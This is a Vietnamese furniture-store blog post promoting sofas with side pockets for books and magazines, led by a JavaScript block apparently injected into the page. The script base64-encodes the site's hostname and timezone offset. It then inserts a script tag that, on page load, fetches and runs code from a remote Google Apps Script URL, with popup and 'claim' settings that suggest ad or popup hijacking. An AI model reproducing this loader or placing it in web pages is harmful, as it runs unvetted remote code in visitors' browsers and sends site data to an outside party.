var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Xu hướng chọn ghế sofa có túi đựng sách báo hiện nay

Xu hướng chọn sofa theo mỗi năm hay mỗi thời gian luôn có sự thay đổi. Sofa trên thị trường lại càng có nhiều mẫu mã khác nhau, đáp ứng nhu cầu của con người. Xu hướng chọn ghế sofa có túi đựng sách báo đang được rất nhiều người ưa chuộng hiện nay.

Tại sao nhiều người thích chọn ghế sofa có túi đựng sách báo?

Có nhiều các kiểu dáng sofa cho phòng khách và bạn có thể chọn lựa theo ý thích. Và hiện nay sofa có thiết kế thêm phần túi đựng sách báo phía tay vịn trở nên hot hơn bao giờ hết.

Trước hết thiết kế của những bộ ghế sofa này đem lại sự tiện nghi cho người dùng, tăng tính năng của ghế sofa hơn. Có nhiều người thích ngồi hay nằm trên ghế sofa để đọc sách nên việc có túi đựng bên hông ghế sẽ cực tiện lợi. Nếu muốn đọc sách bạn chỉ cần lấy ngay tại sofa hoặc đọc xong có thể cất vào vị trí. Vô cùng tiện lợi, không phải mất thời gian để đi tìm sách báo tại tủ sách phải không nào?

Và những bộ sofa có thiết kế phần túi dựng sách báo bên hông còn đem lại giá trị thẩm mĩ cao. Chúng ta có thể thấy cả ở những mẫu sofa vải hay ghế sofa da hiện nay, tuy nhiên sofa vải nỉ sẽ ưu chuộng cách thiết kế này hơn. Sofa thiết kế tạo sự mới mẻ và cho bộ sofa thêm nổi bật.

Một số mẫu ghế sofa có túi đựng sách báo hiện đại nhất

xu hướng chọn ghế sofa có túi đựng sách báo
Bộ sofa góc có túi đựng sách báo cực tiện lợi, chất liệu da cao cấp, màu sắc nhẹ nhàng

xu hướng chọn ghế sofa có túi đựng sách báo

Sofa góc vải nỉ màu xanh da trời, có phần đựng sách báo, tạp chí bên trái, vừa tiện lợi vừa đem lại giá trị thẩm mĩ

xu hướng chọn ghế sofa có túi đựng sách báo

Sofa góc vải nỉ kích thước lớn, có túi đựng sách bên hông. Kích thước lớn nên bạn nằm và đọc sách sẽ rất thoải mái đấy nhé

xu hướng chọn ghế sofa có túi đựng sách báo

Mẫu sofa góc gọn nhẹ, màu nhẹ hợp nhiều không gian. Thiết kế 2 ngăn bên hông ghế đựng tạp chí, sách, sofa êm ái và thoải mái khi dùng

xu hướng chọn ghế sofa có túi đựng sách báo

Tiếp một mẫu sofa theo xu hướng mới. Túi đựng bên hông tiện lợi, tạo giá trị thẩm mĩ, ấn tượng và mới mẻ

xu hướng chọn ghế sofa có túi đựng sách báo

Một bộ ghế sofa góc vải nỉ gam màu xanh cao cấp, chân gỗ chắc chắn, tay vịn ốp gỗ, kích thước thoải mái để nằm đọc sách

Ghế sofa có thiết kế đựng sách báo chính là xu hướng chọn lựa hiện nay được nhiều người yêu thích. Mua ngay các mẫu ghế sofa thiết kế như vậy tại Nội Thất Xinh. Và còn rất nhiều các món đồ nội thất như thảm sofa hay bàn kệ, bàn ghế ăn… tại siêu thị Nội Thất Xinh giúp khách hàng trang hoàng ngôi nhà của mình thêm đẹp hơn.